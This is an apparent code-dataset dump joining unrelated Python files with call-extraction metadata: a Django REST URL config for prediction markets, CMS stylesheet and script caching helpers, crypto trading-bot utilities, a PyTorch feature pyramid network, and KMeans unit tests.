"(target_labels, **model_params['init'])\n", (12782, 12821), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n'), ((9377, 9396), 'preprocessing.parse_seq', 'parse_seq', (['x', 'float'], {}), '(x, float)\n', (9386, 9396), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((9458, 9477), 'preprocessing.parse_seq', 'parse_seq', (['x', 'float'], {}), '(x, float)\n', (9467, 9477), False, 'from preprocessing import clean_text, convert_text2seq, split_data, parse_seq\n'), ((13134, 13181), 'models.CatBoost', 'CatBoost', (['target_labels'], {}), "(target_labels, **model_params['init'])\n", (13142, 13181), False, 'from models import cnn, dense, rnn, TFIDF, CatBoost, save_predictions\n')] |
from django.conf.urls import url
from . import views
app_name = "restapi"
timestamp_regex = '\\d{4}[-]?\\d{1,2}[-]?\\d{1,2} \\d{1,2}:\\d{1,2}:\\d{1,2}'
urlpatterns = [
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^centralized-oracles/$', views.CentralizedOracleListView.as_view(), name='centralized-oracles'),
url(r'^centralized-oracles/(0x)?(?P<oracle_address>[a-fA-F0-9]+)/$', views.CentralizedOracleFetchView.as_view(), name='centralized-oracles-by-address'),
url(r'^events/$', views.EventListView.as_view(), name='events'),
url(r'^events/(0x)?(?P<event_address>[a-fA-F0-9]+)/$', views.EventFetchView.as_view(), name='events-by-address'),
url(r'^markets/$', views.MarketListView.as_view(), name='markets'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/$', views.MarketFetchView.as_view(), name='markets-by-name'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/shares/$', views.AllMarketSharesView.as_view(), name='all-shares'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/shares/(0x)?(?P<owner_address>[a-fA-F0-9]+)/$', views.MarketSharesView.as_view(), name='shares-by-owner'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/trades/$', views.MarketTradesView.as_view(), name='trades-by-market'),
url(r'^markets/(0x)?(?P<market_address>[a-fA-F0-9]+)/trades/(0x)?(?P<owner_address>[a-fA-F0-9]+)/$', views.MarketParticipantTradesView.as_view(), name='trades-by-owner'),
url(r'^account/(0x)?(?P<account_address>[a-fA-F0-9]+)/trades/$', views.AccountTradesView.as_view(), name='trades-by-account'),
url(r'^account/(0x)?(?P<account_address>[a-fA-F0-9]+)/shares/$', views.AccountSharesView.as_view(), name='shares-by-account'),
url(r'^factories/$', views.factories_view, name='factories'),
url(r'^scoreboard/$', views.ScoreboardView.as_view(), name='scoreboard'),
url(r'^scoreboard/(0x)?(?P<account_address>[a-fA-F0-9]+)$', views.ScoreboardUserView.as_view(), name='scoreboard'),
]
| [
"django.conf.urls.url"
] | [((1735, 1794), 'django.conf.urls.url', 'url', (['"""^factories/$"""', 'views.factories_view'], {'name': '"""factories"""'}), "('^factories/$', views.factories_view, name='factories')\n", (1738, 1794), False, 'from django.conf.urls import url\n')] |
import logging
from django.core.cache import cache
from django.db.models import Q
from libscampi.contrib.cms.communism.models import Javascript, StyleSheet
from libscampi.contrib.cms.communism.views.mixins import html_link_refs
logger = logging.getLogger("libscampi.contrib.cms.newsengine.views")
def story_stylesheets(story, theme, refresh_cache = False):
article = story.article
#try to get the cached css for this story / theme combination
cached_css_key = 'theme:{0:d}:story:css:{1:d}'.format(story.id, theme.id)
if refresh_cache:
#invalidate on refresh_cache
cache.delete(cached_css_key)
styles = cache.get(cached_css_key, None)
#cache empty, get the styles and refill the cache
if not styles:
logger.debug("missed css cache on {0:>s}".format(cached_css_key))
playlist_filters = Q(base = True)
if story.video_playlist:
playlist_filters |= Q(mediaplaylisttemplate__videoplaylist__pk = story.video_playlist_id)
if story.image_playlist:
playlist_filters |= Q(mediaplaylisttemplate__imageplaylist__pk = story.image_playlist_id)
if story.audio_playlist:
playlist_filters |= Q(mediaplaylisttemplate__audioplaylist__pk = story.audio_playlist_id)
if story.document_playlist:
playlist_filters |= Q(mediaplaylisttemplate__documentplaylist__pk = story.document_playlist_id)
if story.object_playlist:
playlist_filters |= Q(mediaplaylisttemplate__objectplaylist__pk = story.object_playlist_id)
styles = StyleSheet.objects.filter(active=True, theme__id=theme.id).filter(
#playlist finders
playlist_filters |
#inline finders
Q(mediainlinetemplate__videotype__video__id__in=list(article.video_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__imagetype__image__id__in=list(article.image_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__audiotype__audio__id__in=list(article.audio_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__documenttype__document__id__in=list(article.document_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__objecttype__object__id__in=list(article.object_inlines.values_list('id', flat=True)))
).order_by('precedence').distinct()
cache.set(cached_css_key, styles, 60*10)
#build a simple collection of styles
css_collection = html_link_refs()
for style in styles:
css_collection.add(style)
return css_collection
def story_javascripts(story, theme, refresh_cache = False):
article = story.article
#try to get the cached javascript for this published story
cached_scripts_key = 'theme:{0:d}:story:js:{1:d}'.format(story.id, theme.id)
if refresh_cache:
#invalidate on refresh_cache
cache.delete(cached_scripts_key)
script_ids = cache.get(cached_scripts_key, None)
#cache empty, get the scripts and refill the cache
if not script_ids:
logger.debug("missed css cache on {0:>s}".format(cached_scripts_key))
playlist_filters = Q(base = True)
if story.video_playlist:
playlist_filters |= Q(mediaplaylisttemplate__videoplaylist__pk = story.video_playlist_id)
if story.image_playlist:
playlist_filters |= Q(mediaplaylisttemplate__imageplaylist__pk = story.image_playlist_id)
if story.audio_playlist:
playlist_filters |= Q(mediaplaylisttemplate__audioplaylist__pk = story.audio_playlist_id)
if story.document_playlist:
playlist_filters |= Q(mediaplaylisttemplate__documentplaylist__pk = story.document_playlist_id)
if story.object_playlist:
playlist_filters |= Q(mediaplaylisttemplate__objectplaylist__pk = story.object_playlist_id)
scripts = Javascript.objects.filter(active=True, theme__id=theme.id).filter(
playlist_filters |
#inline finders
Q(mediainlinetemplate__videotype__video__id__in=list(article.video_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__imagetype__image__id__in=list(article.image_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__audiotype__audio__id__in=list(article.audio_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__documenttype__document__id__in=list(article.document_inlines.values_list('id', flat=True))) |
Q(mediainlinetemplate__objecttype__object__id__in=list(article.object_inlines.values_list('id', flat=True)))
).order_by('precedence').distinct()
cache.set(cached_scripts_key, list(scripts.values_list('id', flat = True)), 60*20)
else:
scripts = Javascript.objects.filter(id__in=script_ids).order_by('precedence')
#build a simple collection of styles
script_collection = html_link_refs()
for script in scripts:
script_collection.add(script)
return script_collection | [
"logging.getLogger",
"libscampi.contrib.cms.communism.views.mixins.html_link_refs",
"libscampi.contrib.cms.communism.models.Javascript.objects.filter",
"django.core.cache.cache.delete",
"libscampi.contrib.cms.communism.models.StyleSheet.objects.filter",
"django.core.cache.cache.set",
"django.db.models.Q... | [((239, 298), 'logging.getLogger', 'logging.getLogger', (['"""libscampi.contrib.cms.newsengine.views"""'], {}), "('libscampi.contrib.cms.newsengine.views')\n", (256, 298), False, 'import logging\n'), ((642, 673), 'django.core.cache.cache.get', 'cache.get', (['cached_css_key', 'None'], {}), '(cached_css_key, None)\n', (651, 673), False, 'from django.core.cache import cache\n'), ((2493, 2509), 'libscampi.contrib.cms.communism.views.mixins.html_link_refs', 'html_link_refs', ([], {}), '()\n', (2507, 2509), False, 'from libscampi.contrib.cms.communism.views.mixins import html_link_refs\n'), ((2947, 2982), 'django.core.cache.cache.get', 'cache.get', (['cached_scripts_key', 'None'], {}), '(cached_scripts_key, None)\n', (2956, 2982), False, 'from django.core.cache import cache\n'), ((4927, 4943), 'libscampi.contrib.cms.communism.views.mixins.html_link_refs', 'html_link_refs', ([], {}), '()\n', (4941, 4943), False, 'from libscampi.contrib.cms.communism.views.mixins import html_link_refs\n'), ((600, 628), 'django.core.cache.cache.delete', 'cache.delete', (['cached_css_key'], {}), '(cached_css_key)\n', (612, 628), False, 'from django.core.cache import cache\n'), ((850, 862), 'django.db.models.Q', 'Q', ([], {'base': '(True)'}), '(base=True)\n', (851, 862), False, 'from django.db.models import Q\n'), ((2389, 2431), 'django.core.cache.cache.set', 'cache.set', (['cached_css_key', 'styles', '(60 * 10)'], {}), '(cached_css_key, styles, 60 * 10)\n', (2398, 2431), False, 'from django.core.cache import cache\n'), ((2897, 2929), 'django.core.cache.cache.delete', 'cache.delete', (['cached_scripts_key'], {}), '(cached_scripts_key)\n', (2909, 2929), False, 'from django.core.cache import cache\n'), ((3168, 3180), 'django.db.models.Q', 'Q', ([], {'base': '(True)'}), '(base=True)\n', (3169, 3180), False, 'from django.db.models import Q\n'), ((931, 998), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__videoplaylist__pk': 'story.video_playlist_id'}), '(mediaplaylisttemplate__videoplaylist__pk=story.video_playlist_id)\n', (932, 998), False, 'from django.db.models import Q\n'), ((1066, 1133), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__imageplaylist__pk': 'story.image_playlist_id'}), '(mediaplaylisttemplate__imageplaylist__pk=story.image_playlist_id)\n', (1067, 1133), False, 'from django.db.models import Q\n'), ((1201, 1268), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__audioplaylist__pk': 'story.audio_playlist_id'}), '(mediaplaylisttemplate__audioplaylist__pk=story.audio_playlist_id)\n', (1202, 1268), False, 'from django.db.models import Q\n'), ((1339, 1412), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__documentplaylist__pk': 'story.document_playlist_id'}), '(mediaplaylisttemplate__documentplaylist__pk=story.document_playlist_id)\n', (1340, 1412), False, 'from django.db.models import Q\n'), ((1481, 1550), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__objectplaylist__pk': 'story.object_playlist_id'}), '(mediaplaylisttemplate__objectplaylist__pk=story.object_playlist_id)\n', (1482, 1550), False, 'from django.db.models import Q\n'), ((3249, 3316), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__videoplaylist__pk': 'story.video_playlist_id'}), '(mediaplaylisttemplate__videoplaylist__pk=story.video_playlist_id)\n', (3250, 3316), False, 'from django.db.models import Q\n'), ((3385, 3452), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__imageplaylist__pk': 'story.image_playlist_id'}), '(mediaplaylisttemplate__imageplaylist__pk=story.image_playlist_id)\n', (3386, 3452), False, 'from django.db.models import Q\n'), ((3521, 3588), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__audioplaylist__pk': 'story.audio_playlist_id'}), '(mediaplaylisttemplate__audioplaylist__pk=story.audio_playlist_id)\n', (3522, 3588), False, 'from django.db.models import Q\n'), ((3660, 3733), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__documentplaylist__pk': 'story.document_playlist_id'}), '(mediaplaylisttemplate__documentplaylist__pk=story.document_playlist_id)\n', (3661, 3733), False, 'from django.db.models import Q\n'), ((3803, 3872), 'django.db.models.Q', 'Q', ([], {'mediaplaylisttemplate__objectplaylist__pk': 'story.object_playlist_id'}), '(mediaplaylisttemplate__objectplaylist__pk=story.object_playlist_id)\n', (3804, 3872), False, 'from django.db.models import Q\n'), ((4793, 4837), 'libscampi.contrib.cms.communism.models.Javascript.objects.filter', 'Javascript.objects.filter', ([], {'id__in': 'script_ids'}), '(id__in=script_ids)\n', (4818, 4837), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n'), ((1571, 1629), 'libscampi.contrib.cms.communism.models.StyleSheet.objects.filter', 'StyleSheet.objects.filter', ([], {'active': '(True)', 'theme__id': 'theme.id'}), '(active=True, theme__id=theme.id)\n', (1596, 1629), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n'), ((3894, 3952), 'libscampi.contrib.cms.communism.models.Javascript.objects.filter', 'Javascript.objects.filter', ([], {'active': '(True)', 'theme__id': 'theme.id'}), '(active=True, theme__id=theme.id)\n', (3919, 3952), False, 'from libscampi.contrib.cms.communism.models import Javascript, StyleSheet\n')] |
from inspect import signature
from questionary import Style
from pytz import reference
import math, os, datetime
from typing import Callable
from pandas import DataFrame
############################## CONSTANTS
ROOT_PATH = os.path.expanduser('~') + os.sep + '.yuzu'
STRATS_PATH = ROOT_PATH + os.sep + 'strategies'
ENV_PATH = ROOT_PATH + os.sep + '.env'
CONFIG_PATH = ROOT_PATH + os.sep + 'config.json'
EXCHANGES = ['binance', 'binanceus', 'coinbasepro', 'kraken']
EXCHANGE_NAMES = ['Binance', 'Binance US', 'Coinbase Pro', 'Kraken', 'cancel']
INTERVALS = ['1m','5m','15m','30m','1h','12h','1d']
############################## CLI STYLING
style = Style([
('qmark', 'fg:#673ab7 bold'), # token in front of the question
('question', 'bold'), # question text
('answer', 'fg:#f44336 bold'), # submitted answer text behind the question
('pointer', 'fg:#673ab7 bold'), # pointer used in select and checkbox prompts
('highlighted', 'fg:#673ab7 bold'), # pointed-at choice in select and checkbox prompts
('selected', 'fg:#cc5454'), # style for a selected item of a checkbox
('separator', 'fg:#cc5454'), # separator in lists
('instruction', ''), # user instructions for select, rawselect, checkbox
('text', ''), # plain text
('disabled', 'fg:#858585 italic') # disabled choices for select and checkbox prompts
])
############################## UTILS
def since(interval: str, ticks: int, last_epoch: int = -1):
if last_epoch == -1:
last_epoch = int(datetime.datetime.now(tz=reference.LocalTimezone()).timestamp())
return last_epoch - (int(interval[:-1]) * (3600 if interval[-1] == 'h' else 86400 if interval[-1] == 'd' else 60) * ticks)
def safe_round(amount, precision):
return math.floor(amount * (10**precision))/(10**precision)
class colorprint:
@staticmethod
def red(skk): print("\033[91m {}\033[00m" .format(skk))
@staticmethod
def green(skk): print("\033[92m {}\033[00m" .format(skk))
@staticmethod
def yellow(skk): print("\033[93m {}\033[00m" .format(skk))
@staticmethod
def lightpurple(skk): print("\033[94m {}\033[00m" .format(skk))
@staticmethod
def purple(skk): print("\033[95m {}\033[00m" .format(skk))
@staticmethod
def cyan(skk): print("\033[96m {}\033[00m" .format(skk))
@staticmethod
def lightgrey(skk): print("\033[97m {}\033[00m" .format(skk))
@staticmethod
def black(skk): print("\033[98m {}\033[00m" .format(skk))
def validate_strategy(strategy_module):
sig, params, ret_type = None, None, None
try:
sig = signature(strategy_module.strategy)
params = sig.parameters
ret_type = sig.return_annotation
except: raise AttributeError(f"{strategy_module} has not attribute 'strategy'")
assert type(params[0]) is DataFrame, "First strategy parameter must be of type <class 'pandas.core.frame.DataFrame'>."
assert type(params[1]) is dict, "Second strategy parameter must be of type <class 'dict'>."
assert ret_type is DataFrame, "Strategy return type must be of type <class 'pandas.core.frame.DataFrame'>."
config_range = None
try:
config_range: dict = strategy_module.config_range
except: raise AttributeError(f"{strategy_module} has not attribute 'config_range'")
assert type(config_range) is dict, "Strategy config_range must be of type <class 'dict'>."
for k in ['min_ticks', 'stop_limit_buy', ', stop_limit_sell', 'stop_limit_loss']:
assert k in config_range, f"'{k}' must be included in strategy config_range."
t, ts = (list, "<class 'list'>") if k=='min_ticks' else (float, "<class 'float'>")
assert type(config_range[k]) is t, f"'{k}' must be of type {ts}."
for m in config_range['min_ticks']:
assert m in config_range.keys(), f"'{m}'' must be included in strategy config_range if to be considered for min_ticks key."
config = None # TODO: create random config given config_range
df = DataFrame({'open': [], 'high': [], 'low': [], 'close': [], 'volume': []})
df = strategy_module.strategy(df, config)
assert 'buy' in df.columns, "Buy column must exist in strategy's returned DataFrame."
assert 'sell' in df.columns, "Sell column must exist in strategy's returned DataFrame." | [
"pandas.DataFrame",
"math.floor",
"inspect.signature",
"questionary.Style",
"pytz.reference.LocalTimezone",
"os.path.expanduser"
] | [((650, 951), 'questionary.Style', 'Style', (["[('qmark', 'fg:#673ab7 bold'), ('question', 'bold'), ('answer',\n 'fg:#f44336 bold'), ('pointer', 'fg:#673ab7 bold'), ('highlighted',\n 'fg:#673ab7 bold'), ('selected', 'fg:#cc5454'), ('separator',\n 'fg:#cc5454'), ('instruction', ''), ('text', ''), ('disabled',\n 'fg:#858585 italic')]"], {}), "([('qmark', 'fg:#673ab7 bold'), ('question', 'bold'), ('answer',\n 'fg:#f44336 bold'), ('pointer', 'fg:#673ab7 bold'), ('highlighted',\n 'fg:#673ab7 bold'), ('selected', 'fg:#cc5454'), ('separator',\n 'fg:#cc5454'), ('instruction', ''), ('text', ''), ('disabled',\n 'fg:#858585 italic')])\n", (655, 951), False, 'from questionary import Style\n'), ((4032, 4105), 'pandas.DataFrame', 'DataFrame', (["{'open': [], 'high': [], 'low': [], 'close': [], 'volume': []}"], {}), "({'open': [], 'high': [], 'low': [], 'close': [], 'volume': []})\n", (4041, 4105), False, 'from pandas import DataFrame\n'), ((225, 248), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (243, 248), False, 'import math, os, datetime\n'), ((1817, 1853), 'math.floor', 'math.floor', (['(amount * 10 ** precision)'], {}), '(amount * 10 ** precision)\n', (1827, 1853), False, 'import math, os, datetime\n'), ((2647, 2682), 'inspect.signature', 'signature', (['strategy_module.strategy'], {}), '(strategy_module.strategy)\n', (2656, 2682), False, 'from inspect import signature\n'), ((1603, 1628), 'pytz.reference.LocalTimezone', 'reference.LocalTimezone', ([], {}), '()\n', (1626, 1628), False, 'from pytz import reference\n')] |
from __future__ import annotations
import torch
import torch.nn as nn
from typing import Optional
import warnings
warnings.simplefilter("ignore")
class ConvNormRelu(nn.Module):
def __init__(self, in_channels: int, out_channels: int, upsample: Optional[bool] = False) -> None:
super(ConvNormRelu, self).__init__()
self.upsample = upsample
self.upsample_block = nn.Upsample(scale_factor= 2, mode= 'bilinear', align_corners= True)
layers: dict[str, nn.modules] = {
'conv': nn.Conv2d(in_channels, out_channels, kernel_size= 3, stride= 1, padding= 1, bias= False),
'norm': nn.GroupNorm(32, out_channels),
'relu': nn.ReLU(inplace= True)
}
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
x: torch.Tensor = self.block(x)
if self.upsample:
x: torch.Tensor = self.upsample_block(x)
return x
class SegmentationBlock(nn.Module):
def __init__(self, in_channels: int, out_channels: int, n_upsamples: Optional[int] = 0) -> None:
super(SegmentationBlock, self).__init__()
layers: dict[str, ConvNormRelu] = {
'conv_Norm_relu_1': ConvNormRelu(in_channels, out_channels, upsample= bool(n_upsamples))
}
if n_upsamples > 1:
new_layer: dict[str, ConvNormRelu] = {
f'conv_Norm_relu_{idx + 1}': ConvNormRelu(in_channels, out_channels, upsample= True) for idx in range(1, n_upsamples)
}
layers.update(new_layer)
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.block(x)
class DoubleConv(nn.Module):
def __init__(self, in_channels: int, out_channels: int) -> None:
super(DoubleConv, self).__init__()
layers: dict[str, nn.modules] = {
'conv_1': nn.Conv2d(in_channels, out_channels, 3, padding= 1),
'relu_1': nn.ReLU(inplace= True),
'conv_2': nn.Conv2d(out_channels, out_channels, 3, padding= 1),
'relu_2': nn.ReLU(inplace= True)
}
self.block = nn.Sequential(*layers.values())
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.block(x)
class Feature_PyramidNetwork(nn.Module):
def __init__(self, n_classes: Optional[int] = 1, pyramid_channels: Optional[int] = 256,
segmentation_channels: Optional[int] = 256) -> None:
super(Feature_PyramidNetwork, self).__init__()
self.conv_down1 = DoubleConv(3, 64)
self.conv_down2 = DoubleConv(64, 128)
self.conv_down3 = DoubleConv(128, 256)
self.conv_down4 = DoubleConv(256, 512)
self.conv_down5 = DoubleConv(512, 1024)
self.maxpool = nn.MaxPool2d(2)
self.toplayer = nn.Conv2d(1024, 256, kernel_size=1, stride=1, padding=0)
self.smooth = nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1)
self.latlayer1 = nn.Conv2d(512, 256, kernel_size=1, stride=1, padding=0)
self.latlayer2 = nn.Conv2d(256, 256, kernel_size=1, stride=1, padding=0)
self.latlayer3 = nn.Conv2d(128, 256, kernel_size=1, stride=1, padding=0)
self.seg_blocks = nn.ModuleList([
SegmentationBlock(pyramid_channels, segmentation_channels, n_upsamples=n_upsamples)
for n_upsamples in [0, 1, 2, 3]
])
self.last_conv = nn.Conv2d(256, n_classes, kernel_size=1, stride=1, padding=0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
c1: torch.Tensor = self.maxpool(self.conv_down1(x))
c2: torch.Tensor = self.maxpool(self.conv_down2(c1))
c3: torch.Tensor = self.maxpool(self.conv_down3(c2))
c4: torch.Tensor = self.maxpool(self.conv_down4(c3))
c5: torch.Tensor = self.maxpool(self.conv_down5(c4))
p5: torch.Tensor = self.toplayer(c5)
p4: torch.Tensor = Feature_PyramidNetwork._upsample_add(p5, self.latlayer1(c4))
p3: torch.Tensor = Feature_PyramidNetwork._upsample_add(p4, self.latlayer2(c3))
p2: torch.Tensor = Feature_PyramidNetwork._upsample_add(p3, self.latlayer3(c2))
p4, p3, p2 = self.smooth(p4), self.smooth(p3), self.smooth(p2)
_, _, h, w = p2.size()
feature_pyramid: list[torch.Tensor] = [
seg_block(p) for seg_block, p in zip(self.seg_blocks, [p2, p3, p4, p5])
]
out: torch.Tensor = Feature_PyramidNetwork._upsample(self.last_conv(sum(feature_pyramid)), 4 * h, 4 * w)
out: torch.Tensor = torch.sigmoid(out)
return out
@staticmethod
def _upsample_add(x: torch.Tensor, y: torch.Tensor) -> torch.Tensor:
_,_,h,w = y.size()
upsample = nn.Upsample(size= (h,w), mode= 'bilinear', align_corners= True)
return upsample(x) + y
@staticmethod
def _upsample(x: torch.Tensor, h: int, w: int) -> torch.Tensor:
sample = nn.Upsample(size=(h, w), mode='bilinear', align_corners=True)
return sample(x)
#@: Driver Code
if __name__.__contains__('__main__'):
device: torch.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
fpn = Feature_PyramidNetwork().to(device)
result: torch.Tensor = fpn(torch.rand(1, 3, 256, 256).to(device))
print(result.shape)
| [
"torch.nn.GroupNorm",
"torch.nn.ReLU",
"torch.sigmoid",
"torch.nn.Conv2d",
"torch.nn.MaxPool2d",
"torch.cuda.is_available",
"torch.nn.Upsample",
"warnings.simplefilter",
"torch.rand"
] | [((119, 150), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""'], {}), "('ignore')\n", (140, 150), False, 'import warnings\n'), ((406, 470), 'torch.nn.Upsample', 'nn.Upsample', ([], {'scale_factor': '(2)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(scale_factor=2, mode='bilinear', align_corners=True)\n", (417, 470), True, 'import torch.nn as nn\n'), ((3024, 3039), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2)'], {}), '(2)\n', (3036, 3039), True, 'import torch.nn as nn\n'), ((3075, 3131), 'torch.nn.Conv2d', 'nn.Conv2d', (['(1024)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(1024, 256, kernel_size=1, stride=1, padding=0)\n', (3084, 3131), True, 'import torch.nn as nn\n'), ((3156, 3211), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)'}), '(256, 256, kernel_size=3, stride=1, padding=1)\n', (3165, 3211), True, 'import torch.nn as nn\n'), ((3248, 3303), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(512, 256, kernel_size=1, stride=1, padding=0)\n', (3257, 3303), True, 'import torch.nn as nn\n'), ((3330, 3385), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, 256, kernel_size=1, stride=1, padding=0)\n', (3339, 3385), True, 'import torch.nn as nn\n'), ((3412, 3467), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(128, 256, kernel_size=1, stride=1, padding=0)\n', (3421, 3467), True, 'import torch.nn as nn\n'), ((3711, 3772), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', 'n_classes'], {'kernel_size': '(1)', 'stride': '(1)', 'padding': '(0)'}), '(256, n_classes, kernel_size=1, stride=1, padding=0)\n', (3720, 3772), True, 'import torch.nn as nn\n'), ((4896, 4914), 'torch.sigmoid', 'torch.sigmoid', (['out'], {}), '(out)\n', (4909, 4914), False, 'import torch\n'), ((5098, 5159), 'torch.nn.Upsample', 'nn.Upsample', ([], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(size=(h, w), mode='bilinear', align_corners=True)\n", (5109, 5159), True, 'import torch.nn as nn\n'), ((5313, 5374), 'torch.nn.Upsample', 'nn.Upsample', ([], {'size': '(h, w)', 'mode': '"""bilinear"""', 'align_corners': '(True)'}), "(size=(h, w), mode='bilinear', align_corners=True)\n", (5324, 5374), True, 'import torch.nn as nn\n'), ((538, 626), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels'], {'kernel_size': '(3)', 'stride': '(1)', 'padding': '(1)', 'bias': '(False)'}), '(in_channels, out_channels, kernel_size=3, stride=1, padding=1,\n bias=False)\n', (547, 626), True, 'import torch.nn as nn\n'), ((649, 679), 'torch.nn.GroupNorm', 'nn.GroupNorm', (['(32)', 'out_channels'], {}), '(32, out_channels)\n', (661, 679), True, 'import torch.nn as nn\n'), ((702, 723), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (709, 723), True, 'import torch.nn as nn\n'), ((2031, 2081), 'torch.nn.Conv2d', 'nn.Conv2d', (['in_channels', 'out_channels', '(3)'], {'padding': '(1)'}), '(in_channels, out_channels, 3, padding=1)\n', (2040, 2081), True, 'import torch.nn as nn\n'), ((2107, 2128), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (2114, 2128), True, 'import torch.nn as nn\n'), ((2154, 2205), 'torch.nn.Conv2d', 'nn.Conv2d', (['out_channels', 'out_channels', '(3)'], {'padding': '(1)'}), '(out_channels, out_channels, 3, padding=1)\n', (2163, 2205), True, 'import torch.nn as nn\n'), ((2231, 2252), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (2238, 2252), True, 'import torch.nn as nn\n'), ((5546, 5571), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5569, 5571), False, 'import torch\n'), ((5663, 5689), 'torch.rand', 'torch.rand', (['(1)', '(3)', '(256)', '(256)'], {}), '(1, 3, 256, 256)\n', (5673, 5689), False, 'import torch\n')] |
# Write your k-means unit tests here
from cluster import (KMeans, make_clusters)
import pytest
import numpy as np
def test_kmeans_zero():
"""
Start out with a basic test: Model should not run if k = 0
"""
with pytest.raises(ValueError) as error_message:
km = KMeans(k = 0)
assert "K must be greater than 0!" in str(error_message.value)
def test_kmeans_output():
"""
Another basic test: Check whether my KMeans implementation produces the correct number of prediction labels for various "types" of data
that are generated by the make_clusters function. I'll try this out for various implementations of the data, starting
with "normal" clusters (scale = 1), then tightening and loosening the clusters (scale = 0.3 and scale = 2, respectively).
Finally, I'll try this approach on high-dimensional data.
"""
norm_clusters, norm_labels = make_clusters(k = 4, scale = 1)
t_clusters, t_labels = make_clusters(k = 8, scale = 2)
l_clusters, l_labels = make_clusters(k = 3, scale = 2)
high_dim_clusters, high_dim_labels = make_clusters(n=1000, m=200, k=3)
km_norm = KMeans(k = 4)
km_tight = KMeans(k = 8)
km_loose = KMeans(k = 3)
km_high_dim = KMeans(k = 3)
km_norm.fit(norm_clusters)
km_tight.fit(t_clusters)
km_loose.fit(l_clusters)
km_high_dim.fit(high_dim_clusters)
norm_preds = km_norm.predict(norm_clusters)
tight_preds = km_tight.predict(t_clusters)
loose_preds = km_loose.predict(l_clusters)
high_dim_preds = km_high_dim.predict(high_dim_clusters)
n_norm_preds = len(norm_preds)
n_tight_preds = len(tight_preds)
n_loose_preds = len(loose_preds)
n_high_dim_preds = len(high_dim_preds)
true_n_norm_labs = len(norm_labels)
true_n_tight_labs = len(t_labels)
true_n_loose_labs = len(l_labels)
true_n_high_dim_labs = len(high_dim_labels)
assert n_norm_preds == true_n_norm_labs
assert n_tight_preds == true_n_tight_labs
assert n_loose_preds == true_n_loose_labs
assert n_high_dim_preds == true_n_high_dim_labs
def test_kmeans_n_obs():
"""
My intention for this was to implement a test inside the fit method that would catch if the user was trying to use
n observations < K. However the TAs have graciously included the raising of an Assertion Error in the make_clusters function.
Therefore I've made a test that catches that Assertion Error. Anyways here's the code I was going to implement in the fit method:
if self.n_observations < self.k:
raise ValueError("K must be equal to or greater than the number of observations in your matrix!")
And this would of course have been caught with this test.
"""
with pytest.raises(AssertionError) as error_message:
clusters, labels = make_clusters(n = 3, k=4, scale=1)
assert "" in str(error_message.value) | [
"cluster.make_clusters",
"pytest.raises",
"cluster.KMeans"
